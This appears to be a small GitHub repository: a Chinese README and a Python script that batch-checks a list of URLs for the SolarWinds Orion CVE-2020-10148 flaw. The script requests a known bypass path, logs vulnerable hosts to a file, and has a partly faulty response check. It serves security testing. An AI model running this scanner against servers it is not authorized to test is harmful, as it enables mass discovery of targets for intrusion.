├── CVE-2020-10148.png
├── README.md
└── CVE-2020-10148.py


/CVE-2020-10148.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/B1anda0/CVE-2020-10148/HEAD/CVE-2020-10148.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## 使用方法&免责声明
 2 | 
 3 | 该脚本为SolarWinds Orion API 远程代码执行漏洞批量检测脚本（CVE-2020-10148）。
 4 | 
 5 | 使用方法：`Python CVE-2020-10148.py urls.txt`
 6 | 
 7 | urls.txt 中每个url为一行，漏洞地址输出在vul.txt中
 8 | 
 9 | ##### 影响版本：
10 | 
11 | SolarWinds Orion  2020.2.1 HF 2 及 2019.4 HF 6之前的版本受此漏洞影响。
12 | 
13 | 
14 | 
15 | 工具仅用于安全人员安全测试，任何未授权检测造成的直接或者间接的后果及损失，均由使用者本人负责


--------------------------------------------------------------------------------
/CVE-2020-10148.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # coding:utf-8
 3 | # author:B1anda0
 4 | #affected versions are before SolarWinds Orion 2020.2.1 HF 2 and 2019.4 HF 6
 5 | 
 6 | import requests,sys,colorama
 7 | from colorama import *
 8 | init(autoreset=True)
 9 | 
10 | 
11 | banner='''\033[1;33;40m
12 |   _______      ________    ___   ___ ___   ___        __  ___  __ _  _   ___  
13 |  / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ |/ _ \/_ | || | / _ \ 
14 | | |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | | | || | || || (_) |
15 | | |      \ \/ / |  __|______/ /| | | |/ /| | | |______| | | | || |__   _> _ < 
16 | | |____   \  /  | |____    / /_| |_| / /_| |_| |      | | |_| || |  | || (_) |
17 |  \_____|   \/   |______|  |____|\___/____|\___/       |_|\___/ |_|  |_| \___/ 
18 |                                                                                                                                                                                                                                  
19 | '''
20 | 
21 | 
22 | def verify():
23 | 	headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
24 | 	payload= '/web.config.i18n.ashx?l=en-US&v=B1anda0' #v值可自定义，不可为空
25 | 	poc=urls+payload
26 | 	try:
27 | 		requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
28 | 		response=requests.get(poc,headers=headers,timeout=15,verify=False)
29 | 		if response.status_code==200 and "SolarWinds.Orion.Core.Common" and "/Orion/NetPerfMon/TemplateSiblingIconUrl" in response.content:
30 | 			print(u'\033[1;31;40m[+]{} is solarwinds remote code execution vulnerability'.format(urls))
31 | 			#将漏洞地址输出在Vul.txt中
32 | 			f=open('./vul.txt','a')
33 | 			f.write(urls)
34 | 			f.write('\n')
35 | 		else:
36 | 			print('\033[1;32;40m[-]{} None'.format(urls))
37 | 	except:
38 | 		print('{} request timeout'.format(urls))
39 | 
40 | 
41 | if __name__ == '__main__':
42 | 	print (banner)
43 | 	if len(sys.argv)!=2:
44 | 		print('Example:python CVE-2020-10148.py urls.txt')
45 | 	else:
46 | 		file = open(sys.argv[1])
47 | 		for url in file.readlines():
48 | 			urls=url.strip()
49 | 			if urls[-1]=='/':
50 | 				urls=urls[:-1]
51 | 			verify()
52 | 		print ('Check Over')
53 | 


--------------------------------------------------------------------------------